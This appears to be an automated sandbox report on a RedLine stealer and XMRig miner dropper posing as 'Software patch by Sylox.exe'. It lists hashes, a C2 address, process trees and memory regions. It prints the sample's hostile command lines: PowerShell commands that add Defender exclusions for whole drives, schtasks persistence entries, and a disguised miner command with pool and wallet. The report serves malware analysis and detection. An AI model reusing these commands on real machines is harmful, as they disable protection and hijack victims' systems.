Analysis

- max time kernel: 148s
- max time network: 159s
- platform: windows7_x64
- resource: win7-en-20210920
- submitted: 21-10-2021 13:52

- Static task: static1
- Behavioral task: behavioral1
  - Sample: Software patch by Sylox.exe
  - Resource: win7-en-20210920

General

- Target: Software patch by Sylox.exe
- Size: 3.2MB
- MD5: 32da7dfc115619bf8a6197ec22b75edf
- SHA1: 6118bde049e88592ff92464788c63992a96ece13
- SHA256: ea152bfedb88c978ab9730ab0f6c9f4baed1777e33d5a6e25c3d542b5c39bb61
- SHA512: c2a522312fe8bcbe092c6dd46e6e34c53e0d9bf58bccea1f9de1e96b06c0f08d452e0c000a46f34b1cc5bbe22df866243edd17450c1a2ddf43854ddba26864a1

Malware Config

Extracted
- Family: redline
- Botnet: @faqu_1
- C2: 95.181.152.6:46927

Signatures
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 2 IoCs
Processes:
resource | yara_rule
behavioral1/memory/988-73-0x0000000000360000-0x000000000038E000-memory.dmp | family_redline
behavioral1/memory/988-79-0x0000000001EC0000-0x0000000001ED9000-memory.dmp | family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
XMRig Miner Payload 12 IoCs
Processes:
resource | yara_rule
behavioral1/memory/924-175-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-178-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-181-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-183-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-184-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-185-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-186-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-187-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-189-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-194-0x000000014030F3F8-mapping.dmp | xmrig
behavioral1/memory/924-192-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral1/memory/924-198-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig

Downloads MZ/PE file
Executes dropped EXE 7 IoCs
Processes:
pid | process
872 | Datafile32.exe
1944 | Datafile64.exe
988 | Server32.exe
1800 | services64.exe
1408 | services32.exe
1592 | sihost64.exe
1576 | sihost32.exe

Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Software patch by Sylox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Datafile32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Datafile64.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | services64.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | services32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Software patch by Sylox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Datafile32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Datafile64.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | services64.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | services32.exe

Loads dropped DLL 7 IoCs
Processes:
pid | process
484 | Software patch by Sylox.exe
484 | Software patch by Sylox.exe
484 | Software patch by Sylox.exe
1792 | cmd.exe
1676 | cmd.exe
1760 | conhost.exe
1684 | conhost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource | yara_rule
behavioral1/memory/484-57-0x0000000000C00000-0x0000000000C01000-memory.dmp | themida
\Users\Admin\AppData\Local\Temp\Datafile32.exe | themida
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe | themida
\Users\Admin\AppData\Local\Temp\Datafile64.exe | themida
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe | themida
behavioral1/memory/872-67-0x0000000000400000-0x0000000000E48000-memory.dmp | themida
behavioral1/memory/1944-72-0x0000000000400000-0x0000000000EAE000-memory.dmp | themida
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe | themida
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe | themida
\Windows\System32\services64.exe | themida
C:\Windows\System32\services64.exe | themida
behavioral1/memory/1800-144-0x0000000000400000-0x0000000000EAE000-memory.dmp | themida
\Windows\System32\services32.exe | themida
C:\Windows\System32\services32.exe | themida
behavioral1/memory/1408-150-0x0000000000400000-0x0000000000E48000-memory.dmp | themida
C:\Windows\system32\services64.exe | themida
C:\Windows\system32\services32.exe | themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | services64.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | services32.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Software patch by Sylox.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Datafile32.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Datafile64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs
Drops file in System32 directory 15 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\services32.exe | conhost.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | C:\Windows\system32\services32.exe | conhost.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\services64.exe | conhost.exe
File created | C:\Windows\system32\services64.exe | conhost.exe
File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | conhost.exe
File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | conhost.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
pid | process
484 | Software patch by Sylox.exe
872 | Datafile32.exe
1944 | Datafile64.exe
1800 | services64.exe
1408 | services32.exe

Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 1760 set thread context of 924 | 1760 | conhost.exe | nslookup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
1908 | schtasks.exe
1636 | schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs
Processes:
pid | process
988 | Server32.exe
1152 | conhost.exe
1404 | conhost.exe
1444 | powershell.exe
840 | powershell.exe
1492 | powershell.exe
1656 | powershell.exe
1760 | conhost.exe
1760 | conhost.exe
1168 | powershell.exe
1752 | powershell.exe
1684 | conhost.exe
1684 | conhost.exe
528 | powershell.exe
924 | nslookup.exe
1604 | powershell.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe
924 | nslookup.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 484 | Software patch by Sylox.exe
Token: SeDebugPrivilege | 988 | Server32.exe
Token: SeDebugPrivilege | 1152 | conhost.exe
Token: SeDebugPrivilege | 1404 | conhost.exe
Token: SeDebugPrivilege | 1444 | powershell.exe
Token: SeDebugPrivilege | 840 | powershell.exe
Token: SeDebugPrivilege | 1492 | powershell.exe
Token: SeDebugPrivilege | 1656 | powershell.exe
Token: SeDebugPrivilege | 1760 | conhost.exe
Token: SeDebugPrivilege | 1168 | powershell.exe
Token: SeDebugPrivilege | 1752 | powershell.exe
Token: SeDebugPrivilege | 1684 | conhost.exe
Token: SeLockMemoryPrivilege | 924 | nslookup.exe
Token: SeLockMemoryPrivilege | 924 | nslookup.exe
Token: SeDebugPrivilege | 528 | powershell.exe
Token: SeDebugPrivilege | 1604 | powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 484 wrote to memory of 872 | 484 | Software patch by Sylox.exe | Datafile32.exe
PID 484 wrote to memory of 872 | 484 | Software patch by Sylox.exe | Datafile32.exe
PID 484 wrote to memory of 872 | 484 | Software patch by Sylox.exe | Datafile32.exe
PID 484 wrote to memory of 872 | 484 | Software patch by Sylox.exe | Datafile32.exe
PID 484 wrote to memory of 1944 | 484 | Software patch by Sylox.exe | Datafile64.exe
PID 484 wrote to memory of 1944 | 484 | Software patch by Sylox.exe | Datafile64.exe
PID 484 wrote to memory of 1944 | 484 | Software patch by Sylox.exe | Datafile64.exe
PID 484 wrote to memory of 1944 | 484 | Software patch by Sylox.exe | Datafile64.exe
PID 484 wrote to memory of 988 | 484 | Software patch by Sylox.exe | Server32.exe
PID 484 wrote to memory of 988 | 484 | Software patch by Sylox.exe | Server32.exe
PID 484 wrote to memory of 988 | 484 | Software patch by Sylox.exe | Server32.exe
PID 484 wrote to memory of 988 | 484 | Software patch by Sylox.exe | Server32.exe
PID 872 wrote to memory of 1404 | 872 | Datafile32.exe | conhost.exe
PID 872 wrote to memory of 1404 | 872 | Datafile32.exe | conhost.exe
PID 872 wrote to memory of 1404 | 872 | Datafile32.exe | conhost.exe
PID 872 wrote to memory of 1404 | 872 | Datafile32.exe | conhost.exe
PID 1944 wrote to memory of 1152 | 1944 | Datafile64.exe | conhost.exe
PID 1944 wrote to memory of 1152 | 1944 | Datafile64.exe | conhost.exe
PID 1944 wrote to memory of 1152 | 1944 | Datafile64.exe | conhost.exe
PID 1944 wrote to memory of 1152 | 1944 | Datafile64.exe | conhost.exe
PID 1152 wrote to memory of 1668 | 1152 | conhost.exe | cmd.exe
PID 1152 wrote to memory of 1668 | 1152 | conhost.exe | cmd.exe
PID 1152 wrote to memory of 1668 | 1152 | conhost.exe | cmd.exe
PID 1404 wrote to memory of 1008 | 1404 | conhost.exe | cmd.exe
PID 1404 wrote to memory of 1008 | 1404 | conhost.exe | cmd.exe
PID 1404 wrote to memory of 1008 | 1404 | conhost.exe | cmd.exe
PID 1668 wrote to memory of 1444 | 1668 | cmd.exe | powershell.exe
PID 1668 wrote to memory of 1444 | 1668 | cmd.exe | powershell.exe
PID 1668 wrote to memory of 1444 | 1668 | cmd.exe | powershell.exe
PID 1008 wrote to memory of 840 | 1008 | cmd.exe | powershell.exe
PID 1008 wrote to memory of 840 | 1008 | cmd.exe | powershell.exe
PID 1008 wrote to memory of 840 | 1008 | cmd.exe | powershell.exe
PID 1152 wrote to memory of 1748 | 1152 | conhost.exe | cmd.exe
PID 1152 wrote to memory of 1748 | 1152 | conhost.exe | cmd.exe
PID 1152 wrote to memory of 1748 | 1152 | conhost.exe | cmd.exe
PID 1748 wrote to memory of 1908 | 1748 | cmd.exe | schtasks.exe
PID 1748 wrote to memory of 1908 | 1748 | cmd.exe | schtasks.exe
PID 1748 wrote to memory of 1908 | 1748 | cmd.exe | schtasks.exe
PID 1404 wrote to memory of 1764 | 1404 | conhost.exe | cmd.exe
PID 1404 wrote to memory of 1764 | 1404 | conhost.exe | cmd.exe
PID 1404 wrote to memory of 1764 | 1404 | conhost.exe | cmd.exe
PID 1764 wrote to memory of 1636 | 1764 | cmd.exe | schtasks.exe
PID 1764 wrote to memory of 1636 | 1764 | cmd.exe | schtasks.exe
PID 1764 wrote to memory of 1636 | 1764 | cmd.exe | schtasks.exe
PID 1008 wrote to memory of 1492 | 1008 | cmd.exe | powershell.exe
PID 1008 wrote to memory of 1492 | 1008 | cmd.exe | powershell.exe
PID 1008 wrote to memory of 1492 | 1008 | cmd.exe | powershell.exe
PID 1668 wrote to memory of 1656 | 1668 | cmd.exe | powershell.exe
PID 1668 wrote to memory of 1656 | 1668 | cmd.exe | powershell.exe
PID 1668 wrote to memory of 1656 | 1668 | cmd.exe | powershell.exe
PID 1152 wrote to memory of 1792 | 1152 | conhost.exe | cmd.exe
PID 1152 wrote to memory of 1792 | 1152 | conhost.exe | cmd.exe
PID 1152 wrote to memory of 1792 | 1152 | conhost.exe | cmd.exe
PID 1792 wrote to memory of 1800 | 1792 | cmd.exe | services64.exe
PID 1792 wrote to memory of 1800 | 1792 | cmd.exe | services64.exe
PID 1792 wrote to memory of 1800 | 1792 | cmd.exe | services64.exe
PID 1404 wrote to memory of 1676 | 1404 | conhost.exe | cmd.exe
PID 1404 wrote to memory of 1676 | 1404 | conhost.exe | cmd.exe
PID 1404 wrote to memory of 1676 | 1404 | conhost.exe | cmd.exe
PID 1676 wrote to memory of 1408 | 1676 | cmd.exe | services32.exe
PID 1676 wrote to memory of 1408 | 1676 | cmd.exe | services32.exe
PID 1676 wrote to memory of 1408 | 1676 | cmd.exe | services32.exe
PID 1800 wrote to memory of 1760 | 1800 | services64.exe | conhost.exe
PID 1800 wrote to memory of 1760 | 1800 | services64.exe | conhost.exe

Processes

[depth 1] C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Software patch by Sylox.exe"
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\conhost.exe
      Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\System32\cmd.exe
        Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      [depth 4] C:\Windows\System32\cmd.exe
        Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
          - Creates scheduled task(s)

      [depth 4] C:\Windows\System32\cmd.exe
        Command line: "cmd" cmd /c "C:\Windows\system32\services32.exe"
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\system32\services32.exe
          Command line: C:\Windows\system32\services32.exe
          - Executes dropped EXE
          - Checks BIOS information in registry
          - Checks whether UAC is enabled
          - Suspicious use of NtSetInformationThreadHideFromDebugger

          [depth 6] C:\Windows\System32\conhost.exe
            Command line: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
            - Loads dropped DLL
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

            [depth 7] C:\Windows\System32\cmd.exe
              Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                - Drops file in System32 directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                - Drops file in System32 directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            [depth 7] C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
              Command line: "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
              - Executes dropped EXE

              [depth 8] C:\Windows\System32\conhost.exe
                Command line: "C:\Windows\System32\conhost.exe" "/sihost32"

  [depth 2] C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\conhost.exe
      Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\System32\cmd.exe
        Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      [depth 4] C:\Windows\System32\cmd.exe
        Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          - Creates scheduled task(s)

      [depth 4] C:\Windows\System32\cmd.exe
        Command line: "cmd" cmd /c "C:\Windows\system32\services64.exe"
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\system32\services64.exe
          Command line: C:\Windows\system32\services64.exe
          - Executes dropped EXE
          - Checks BIOS information in registry
          - Checks whether UAC is enabled
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious use of WriteProcessMemory

          [depth 6] C:\Windows\System32\conhost.exe
            Command line: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
            - Loads dropped DLL
            - Drops file in System32 directory
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

            [depth 7] C:\Windows\System32\cmd.exe
              Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                - Drops file in System32 directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                - Drops file in System32 directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            [depth 7] C:\Windows\system32\Microsoft\Libs\sihost64.exe
              Command line: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
              - Executes dropped EXE

              [depth 8] C:\Windows\System32\conhost.exe
                Command line: "C:\Windows\System32\conhost.exe" "/sihost64"

            [depth 7] C:\Windows\System32\nslookup.exe (command line, as captured by the sandbox, follows)
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Users\Admin\AppData\Local\Temp\Server32.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Server32.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
\Windows\System32\services32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
\Windows\System32\services64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
memory/484-54-0x00000000757B1000-0x00000000757B3000-memory.dmpFilesize
8KB
-
memory/484-57-0x0000000000C00000-0x0000000000C01000-memory.dmpFilesize
4KB
-
memory/484-59-0x00000000054E0000-0x00000000054E1000-memory.dmpFilesize
4KB
-
memory/528-213-0x00000000028AB000-0x00000000028CA000-memory.dmpFilesize
124KB
-
memory/528-210-0x00000000028A0000-0x00000000028A2000-memory.dmpFilesize
8KB
-
memory/528-208-0x000007FEECA90000-0x000007FEED5ED000-memory.dmpFilesize
11.4MB
-
memory/528-197-0x0000000000000000-mapping.dmp
-
memory/528-211-0x00000000028A2000-0x00000000028A4000-memory.dmpFilesize
8KB
-
memory/528-212-0x00000000028A4000-0x00000000028A7000-memory.dmpFilesize
12KB
-
memory/840-106-0x00000000024B2000-0x00000000024B4000-memory.dmpFilesize
8KB
-
memory/840-107-0x000007FEED4C0000-0x000007FEEE01D000-memory.dmpFilesize
11.4MB
-
memory/840-103-0x00000000024B0000-0x00000000024B2000-memory.dmpFilesize
8KB
-
memory/840-93-0x0000000000000000-mapping.dmp
-
memory/840-112-0x00000000024B4000-0x00000000024B7000-memory.dmpFilesize
12KB
-
memory/840-120-0x00000000024BB000-0x00000000024DA000-memory.dmpFilesize
124KB
-
memory/872-67-0x0000000000400000-0x0000000000E48000-memory.dmpFilesize
10.3MB
-
memory/872-66-0x0000000000401000-0x0000000000403000-memory.dmpFilesize
8KB
-
memory/872-61-0x0000000000000000-mapping.dmp
-
memory/924-192-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-183-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-167-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
